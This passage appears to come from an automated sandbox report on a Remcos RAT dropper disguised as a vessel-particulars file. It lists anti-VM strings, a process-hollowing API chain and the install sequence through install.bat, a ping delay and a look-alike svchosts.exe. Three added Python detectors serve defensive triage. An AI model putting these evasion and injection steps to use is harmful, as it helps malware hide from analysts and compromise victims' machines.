@Z,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std
@@QBEPBDXZ,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindNextFileA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,17_2_004057B6
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_0040BEA2 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std
@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?17_2_0040BEA2
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe | Thread delayed: delay time: 922337203685477
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, svchosts.exe, 00000016.00000002.388465248.0000000003024000.00000004.00000001.sdmp, svchosts.exe, 00000017.00000002.407164584.0000000002EC4000.00000004.00000001.sdmp, svchosts.exe, 00000019.00000002.421492633.0000000002A84000.00000004.00000001.sdmp, svchosts.exe, 0000001F.00000002.471564626.0000000000400000.00000040.00000001.sdmp, svchosts.exe, 00000021.00000002.403933269.0000000000400000.00000040.00000001.sdmp, svchosts.exe, 00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
          Source: svchosts.exe, 00000019.00000002.421463243.0000000002A6A000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
          Source: svchosts.exe, 00000019.00000002.421463243.0000000002A6A000.00000004.00000001.sdmp | Binary or memory string: vmware
          Source: svchosts.exe, 00000019.00000002.421463243.0000000002A6A000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: svchosts.exe, 00000019.00000002.421463243.0000000002A6A000.00000004.00000001.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: svchosts.exe, 00000019.00000002.421463243.0000000002A6A000.00000004.00000001.sdmp | Binary or memory string: VMWARE
          Source: svchosts.exe, 00000019.00000002.421463243.0000000002A6A000.00000004.00000001.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: svchosts.exe, 00000019.00000002.421463243.0000000002A6A000.00000004.00000001.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: svchosts.exe, 00000019.00000002.421463243.0000000002A6A000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
          Source: svchosts.exe, 00000019.00000002.421463243.0000000002A6A000.00000004.00000001.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.296655049.000000000271B000.00000004.00000001.sdmp, MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, svchosts.exe, 00000016.00000002.388465248.0000000003024000.00000004.00000001.sdmp, svchosts.exe, 00000017.00000002.407164584.0000000002EC4000.00000004.00000001.sdmp, svchosts.exe, 00000019.00000002.421492633.0000000002A84000.00000004.00000001.sdmp, svchosts.exe, 0000001F.00000002.471564626.0000000000400000.00000040.00000001.sdmp, svchosts.exe, 00000021.00000002.403933269.0000000000400000.00000040.00000001.sdmp, svchosts.exe, 00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmp | Binary or memory string: @HARDWARE\ACPI\DSDT\VBOX__PROCMON_WINDOW_CLASSPROCEXPL21invalid vector<T> subscript?playaudiodatafmt WAVERIFF.wav%Y-%m-%d %H.%MgetcamsingleframenocamerastartcamcapclosecamgetcamframeinitcamcapFreeFrameGetFrameCloseCameraOpenCameracamdlldatacamframe|dmc|[DataStart][DataStart]0000%02i:%02i:%02i:%03i [KeepAlive] Enabled! (Timeout: %i seconds)
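The strings above are the hardware and registry names the sample compares against to recognise a VirtualBox or VMware guest (the VBOX__ ACPI table name, the VMware Tools key and install path, the VMware SVGA II adapter name, and the SCSI, disk and display-class enumeration keys). As an added example, not part of the report and not Joe Sandbox or Remcos code, the Python below scans a memory region for those indicators in both ANSI and UTF-16LE form, the way a triage script or an AntiVM Yara rule would. The dump it runs on is constructed inline to reproduce the fused VBOX__/PROCMON blob in the last entry; the indicator names and the hypervisor grouping are this example's own.

```python
"""Scan a memory dump for the hypervisor artifacts this report lists under
"Binary or memory string".  Added example for this page; not Joe Sandbox or
Remcos code.
"""
from __future__ import annotations

# Indicator strings taken from the report entries above.  Both the narrow
# (ANSI) and the wide (UTF-16LE) encoding are searched because the sample
# keeps some of these as char strings and some as wchar_t strings.
INDICATORS = {
    "vbox_acpi_dsdt":    "HARDWARE\\ACPI\\DSDT\\VBOX__",
    "vmware_tools_key":  "SOFTWARE\\VMware, Inc.\\VMware Tools",
    "vmware_tools_path": "C:\\PROGRAM FILES\\VMWARE\\VMWARE TOOLS\\",
    "vmware_svga":       "VMware SVGA II",
    "scsi_devicemap":    "HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port ",
    "disk_enum":         "SYSTEM\\ControlSet001\\Services\\Disk\\Enum",
    "display_class_key": "SYSTEM\\ControlSet001\\Control\\Class\\"
                         "{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000",
}


def _needles(text: str):
    """Yield (encoding, bytes) pairs for one indicator, lower-cased so the
    search is case-insensitive.  bytes.lower() only touches ASCII letters,
    which is exactly right for UTF-16LE text whose high bytes are 0x00."""
    low = text.lower()
    yield "ansi", low.encode("latin-1")
    yield "utf-16-le", low.encode("utf-16-le")


def scan_dump(dump: bytes) -> dict:
    """Return {indicator_name: [(offset, encoding), ...]} for every hit."""
    hay = dump.lower()
    hits = {}
    for name, text in INDICATORS.items():
        for enc, needle in _needles(text):
            start = 0
            while (pos := hay.find(needle, start)) != -1:
                hits.setdefault(name, []).append((pos, enc))
                start = pos + 1
    return hits


def targeted_hypervisors(hits: dict) -> set:
    """Map hit names to the product the check is aimed at."""
    families = set()
    for name in hits:
        if name.startswith("vbox"):
            families.add("VirtualBox")
        elif name.startswith("vmware"):
            families.add("VMware")
        else:
            families.add("generic hardware enumeration")
    return families


# Constructed stand-in for a .sdmp region (not a real dump): filler, one ANSI
# string, one UTF-16LE string, then the fused blob the report shows, where the
# VirtualBox key sits directly before the Process Monitor window-class names.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"VMware SVGA II\x00"
    + "SOFTWARE\\VMware, Inc.\\VMware Tools".encode("utf-16-le") + b"\x00\x00"
    + b"@HARDWARE\\ACPI\\DSDT\\VBOX__PROCMON_WINDOW_CLASSPROCEXPL"
    + b"\x00" * 8
)

if __name__ == "__main__":
    found = scan_dump(SAMPLE_DUMP)
    for name, where in sorted(found.items()):
        print(f"{name:18s} at {', '.join(f'{o:#06x} ({e})' for o, e in where)}")
    print("targets:", ", ".join(sorted(targeted_hypervisors(found))))
```

Run it against a real region by reading the .sdmp file into bytes and passing it to scan_dump; the offsets it returns are what you would feed into a Yara rule or an IDA/Ghidra bookmark to find the comparison code that uses each string.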
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Code function: 17_2_00407D38 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Code function: 17_2_004011A3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Process token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe | Process token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe | Process token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          Contains functionality to inject code into remote processes
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Code function: 17_2_0040D477 _EH_prolog,CloseHandle,GetModuleHandleA,GetProcAddress,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread
          Injects a PE file into a foreign process
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Memory written: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe | Memory written: C:\Users\user\AppData\Roaming\remcos\svchosts.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe | Memory written: C:\Users\user\AppData\Roaming\remcos\svchosts.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe | Memory written: C:\Users\user\AppData\Roaming\remcos\svchosts.exe base: 400000 value starts with: 4D5A
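Function 17_2_0040D477 above is the textbook process-hollowing sequence (create a child, read its thread context, allocate in it, write the new image in several pieces, repoint the thread, resume), and the "Memory written" entries show its effect: an MZ header (4D5A) landing at 0x400000 inside a freshly created copy of the same executable. As an added example, not part of the report and not Joe Sandbox or Remcos code, the Python below parses the report's call list, checks for the ordered hollowing chain, and pairs it with memory-write events. The MemoryWrite records are constructed to mirror the report entries, and the 0x400000 image base is an assumption taken from them.

```python
"""Recognise the process-hollowing evidence recorded in this report: the
CreateProcess -> GetThreadContext -> VirtualAllocEx -> WriteProcessMemory ->
SetThreadContext -> ResumeThread chain, plus an MZ header written at the
child's image base.  Added example for this page; not Joe Sandbox or Remcos
code.
"""
from __future__ import annotations
import re
from dataclasses import dataclass

# Ordered subsequence that characterises classic hollowing.  Other calls may
# sit between the steps (the sample interleaves VirtualAlloc and
# ReadProcessMemory and issues four writes: headers plus sections).
HOLLOWING_CHAIN = (
    "CreateProcess", "GetThreadContext", "VirtualAllocEx",
    "WriteProcessMemory", "SetThreadContext", "ResumeThread",
)
_FUNC_ID = re.compile(r"\d+_\d+_[0-9A-Fa-f]{8}")


def canon(name: str) -> str:
    """Fold the A/W suffix so CreateProcessA and CreateProcessW compare equal."""
    if len(name) > 2 and name[-1] in "AW" and name[-2].islower():
        return name[:-1]
    return name


def parse_report_trace(line: str):
    """Split '17_2_0040D477 a,b,c,17_2_0040D477' into (id, [calls]); the
    report repeats the function id after the list, so it is filtered out."""
    func_id, _, rest = line.strip().partition(" ")
    calls = [c.strip() for c in rest.split(",") if c.strip()]
    return func_id, [c for c in calls if not _FUNC_ID.fullmatch(c)]


def matches_chain(calls, chain=HOLLOWING_CHAIN) -> bool:
    """True when every step of `chain` occurs in `calls` in that order."""
    want = [canon(c) for c in chain]
    i = 0
    for call in calls:
        if i < len(want) and canon(call) == want[i]:
            i += 1
    return i == len(want)


@dataclass(frozen=True)
class MemoryWrite:
    source: str   # writing process
    target: str   # process written to
    base: int     # destination address
    head: bytes   # first bytes written


def is_pe_image_overwrite(ev: MemoryWrite, image_base: int = 0x400000) -> bool:
    """An 'MZ' header landing at the target's image base is the write that
    replaces the original image.  0x400000 is this sample's base (assumed
    from the report); pass the real ImageBase for other targets."""
    return ev.base == image_base and ev.head.startswith(b"MZ")


def triage(trace_line: str, events, image_base: int = 0x400000) -> list:
    """Combine the static call chain with the dynamic write events."""
    func_id, calls = parse_report_trace(trace_line)
    findings = []
    if matches_chain(calls):
        writes = sum(1 for c in calls if canon(c) == "WriteProcessMemory")
        findings.append(f"{func_id}: hollowing API chain ({writes} WriteProcessMemory calls)")
    for ev in events:
        if is_pe_image_overwrite(ev, image_base):
            findings.append(f"PE header written at {ev.base:#x} in {ev.target} by {ev.source}")
    return findings


# The call list of 17_2_0040D477 as printed in the report, and the sample's
# import-resolver function (also from the report) for contrast.
REPORT_TRACE = (
    "17_2_0040D477 _EH_prolog,CloseHandle,GetModuleHandleA,GetProcAddress,"
    "CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,"
    "WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,"
    "SetThreadContext,ResumeThread,17_2_0040D477"
)
BENIGN_TRACE = "17_2_00407D38 LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,17_2_00407D38"

# Constructed write events: the first mirrors the report's MZ-at-0x400000
# entries, the second is an unrelated write that must not alert.
RAT = r"C:\Users\user\AppData\Roaming\remcos\svchosts.exe"
SAMPLE_EVENTS = [
    MemoryWrite(RAT, RAT, 0x400000, b"MZ\x90\x00"),
    MemoryWrite(RAT, RAT, 0x7FFE0000, b"\x00\x00\x00\x00"),
]

if __name__ == "__main__":
    for finding in triage(REPORT_TRACE, SAMPLE_EVENTS):
        print(finding)
```

The chain check is an ordered-subsequence match rather than an exact one so that the same rule survives the noise a real trace carries between steps; the write check is what an EDR sensor sees at runtime, and the two together are far stronger than either alone, since a legitimate debugger or loader can produce one of them but rarely both.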
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Process created: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe {path}
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\install.bat' '
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE PING 127.0.0.1 -n 2
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Roaming\remcos\svchosts.exe 'C:\Users\user\AppData\Roaming\remcos\svchosts.exe'
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe | Process created: C:\Users\user\AppData\Roaming\remcos\svchosts.exe {path}
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe | Process created: C:\Users\user\AppData\Roaming\remcos\svchosts.exe {path}
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe | Process created: C:\Users\user\AppData\Roaming\remcos\svchosts.exe {path}
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe | Process created: C:\Users\user\AppData\Roaming\remcos\svchosts.exe {path}
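The process tree above is the RAT's install step: the dropper runs cmd.exe on install.bat from %TEMP%, the batch file pings 127.0.0.1 with -n 2 (cmd has no sleep command, and a loopback ping with two requests pauses for about one second), and then starts svchosts.exe, the RAT copy, from %APPDATA%\remcos under a name one letter away from svchost.exe. As an added example, not part of the report and not Joe Sandbox or Remcos code, the Python below reconstructs that chain from process-creation records and flags it. The events are constructed from the "Process created" lines with invented pids; the batch-file quoting is assumed to be the usual cmd /c "" ... "" form that the report renders with single quotes, and the system-binary name list is this example's own.

```python
"""Flag the dropper -> cmd.exe(install.bat in %TEMP%) -> PING 127.0.0.1 -n N
-> payload-from-%APPDATA% staging chain this report shows.  Added example
for this page; not Joe Sandbox or Remcos code.
"""
from __future__ import annotations
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# ping aimed at the local host with a request count: a sleep, not a probe.
_PING_SLEEP = re.compile(
    r"^\s*(?:\S*\\)?ping(?:\.exe)?\s+.*?(?<!\S)(?:127\.0\.0\.1|localhost|::1)(?!\S).*?-n\s+(\d+)",
    re.IGNORECASE,
)
# cmd /c or /k on a .bat/.cmd that lives in a temp directory.
_BATCH_FROM_TEMP = re.compile(
    r"cmd(?:\.exe)?\s+/[ck]\s+.*?\\(?:AppData\\Local\\Temp|Windows\\Temp)\\[^\"']+\.(?:bat|cmd)\b",
    re.IGNORECASE,
)
_USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\(?:Roaming|Local)\\", re.IGNORECASE)
# Assumed list for the look-alike check; extend for your environment.
_SYSTEM_NAMES = ("svchost", "csrss", "lsass", "winlogon", "explorer", "conhost", "dllhost")


def ping_sleep_seconds(cmdline: str):
    """Approximate delay of a loopback 'ping -n N': N-1 seconds (one second
    between requests, replies are immediate).  None if not a loopback ping."""
    m = _PING_SLEEP.search(cmdline)
    return max(int(m.group(1)) - 1, 0) if m else None


def _edit_distance(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def looks_like_system_name(image: str) -> bool:
    """True for a basename within one edit of a Windows system binary, which
    catches 'svchosts.exe' as well as an exact 'svchost.exe'."""
    stem = re.sub(r"\.exe$", "", image.rsplit("\\", 1)[-1].lower())
    return any(_edit_distance(stem, s) <= 1 for s in _SYSTEM_NAMES)


def find_staging_chains(events) -> list:
    """One finding per cmd.exe that ran a batch file from a temp directory and
    whose children include both a loopback ping sleep and an executable
    started from a user-writable directory."""
    children = {}
    for ev in events:
        children.setdefault(ev.ppid, []).append(ev)
    findings = []
    for ev in events:
        if not _BATCH_FROM_TEMP.search(ev.cmdline):
            continue
        kids = children.get(ev.pid, [])
        sleeps = [s for s in (ping_sleep_seconds(k.cmdline) for k in kids) if s is not None]
        payloads = [k for k in kids if _USER_WRITABLE.search(k.image)]
        if sleeps and payloads:
            findings.append({
                "installer_pid": ev.pid,
                "sleep_seconds": sum(sleeps),
                "payload": payloads[0].image,
                "mimics_system_binary": looks_like_system_name(payloads[0].image),
            })
    return findings


# Constructed events mirroring the report's process tree (pids invented).
DROPPER = r"C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe"
RAT = r"C:\Users\user\AppData\Roaming\remcos\svchosts.exe"
EVENTS = [
    ProcessEvent(100, 1, DROPPER, f'"{DROPPER}"'),
    ProcessEvent(200, 100, r"C:\Windows\SysWOW64\cmd.exe",
                 r'C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\install.bat" "'),
    ProcessEvent(201, 200, r"C:\Windows\SysWOW64\PING.EXE", "PING 127.0.0.1 -n 2"),
    ProcessEvent(202, 200, RAT, f'"{RAT}"'),
    # Ordinary connectivity check from an admin shell: must not alert.
    ProcessEvent(300, 1, r"C:\Windows\System32\cmd.exe", r"cmd.exe /c ping 8.8.8.8 -n 4"),
]

if __name__ == "__main__":
    for chain in find_staging_chains(EVENTS):
        print(chain)
```

Fed with Sysmon event ID 1 or Windows 4688 records (pid, parent pid, image, command line), this gives a low-noise rule: installers do sometimes ping localhost as a delay, but rarely from a batch file in %TEMP% and rarely followed by a sibling started from AppData, so require all three parts before alerting.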
          Source: svchosts.exe, 0000001F.00000002.474670828.0000000001630000.00000002.00000001.sdmp | Binary or memory string: Program Manager
          Source: svchosts.exe, 0000001F.00000002.474670828.0000000001630000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: svchosts.exe, 0000001F.00000002.474670828.0000000001630000.00000002.00000001.sdmp | Binary or memory string: Progman
          Source: svchosts.exe, 0000001F.00000002.476505201.0000000002C35000.00000004.00000040.sdmp | Binary or memory string: Program Manager,:
          Source: svchosts.exe, 0000001F.00000002.475378814.0000000002B7D000.00000004.00000001.sdmp, logs.dat.31.dr | Binary or memory string: [ Program Manager ]
          Source: svchosts.exe, 0000001F.00000002.476505201.0000000002C35000.00000004.00000040.sdmp | Binary or memory string: Program ManagerpData\Roaming\
          Source: svchosts.exe, 0000001F.00000002.474670828.0000000001630000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
          Source: svchosts.exe, 0000001F.00000002.476505201.0000000002C35000.00000004.00000040.sdmp | Binary or memory string: Program ManagerpData\RoamingJ:
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Code function: 17_2_0040818A GetLocaleInfoA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\arial.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF (VolumeInformation)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF (VolumeInformation)
